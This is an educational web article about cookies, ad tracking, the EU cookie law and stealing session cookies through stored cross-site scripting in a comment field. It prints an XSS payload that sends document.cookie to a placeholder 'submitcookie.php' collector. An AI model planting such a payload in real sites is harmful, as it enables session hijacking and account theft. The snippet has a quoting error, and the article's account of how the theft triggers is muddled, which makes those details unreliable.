Cookie Tracking and Stealing using Cross-Site Scripting

How are cookies used in a website

A cookie is a randomly generated alphanumeric string which is generated when you visit a webpage and is sent to your browser by that webpage to be kept as a record of your presence on that website so that you can be recognized by that site when you visit it again because of your previous session(known as session ID). But that’s not the only purpose of cookies they are also extensively used to keep a track of your preferences online and they travel from one server to another and can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.

The Cookie Trail

As stated earlier, when we request a webpage to a server the server contacts that site and renders the webpage to our local machine. While rendering the webpage which is mostly HTML, CSS & some JavaScript along with that it also sends a cookie(1st party cookie) which identifies the session.
Besides the website, when we visit a webpage we often see a lot of adverts. These ads are not actually the part of that website but are  being supplied from different servers around the world to the website in exchange for money. Whenever we click one of these ads, it sends back a cookie to its respective server and the server stores it to keep a track of our preferences. The servers also communicate with each other and they form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time unknowingly. Keeping this in mind the EU Directive passed something known as “The Cookie Law” according to which the site has to ask for your permission to use cookies. This is why you see a message on certain site like “This site uses cookies to enhance user experience……” asking for your permission.

The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and give them a choice to allow it or not.

Cookie Theft

Shopping preferences might not classify as sensitive information about an individual but online shopping carts and banking details are really sensitive data and all of this is also remembered by a site with the help of session cookies. If an attacker manages to get a hold of your session cookies then that person will be able to pose as you and that site and will have access to your banking details and your amazon shopping cart and might order stuff from your amazon account to his/her address spending all your money. This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability. This is found mostly in badly-coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.

How websites use XSS to steal cookies?

I’m going to explain this with a hypothetical scenario. So lets say we visit one such vulnerable site which has a comments section on it. Now on an ideal, secure website a comment section should only have text in plain English but on an unsecure site, if we post a code in the comment section the site would think that it is some code from the server side and it is supposed to run that code.

filter_none

edit
close

play_arrow

link
brightness_4
code

    
<script>    
    document.write('<img src="http://localhost/submitcookie.php? cookie ='
    + escape(document.cookie) + '" />);
</script>

chevron_right


  • This code when posted in the comments section will tick the browser into thinking that it is Javascript code(due to the scripts tags) sent by the server and will make it run it.
  • When some user visiting the site looks at the comment section he/she will see a link to an image in the comments section which is actually the result of the script running.
  • When a user clicks on this link thinking that it is an image (whereas it actually is a php file) they get an image rendered in the comment section. What they don’t know is that this link silently executed a php file which grabs their cookie.
  • Now, the cookie which has that users session ID is saved in the attackers database and the attacker can pose as that user on that site.

Related Article:
How are cookies used in a website
Session Hijacking

References: Computerhile – YouTube channel

This article is contributed by Palash Nigam . If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above.



My Personal Notes arrow_drop_up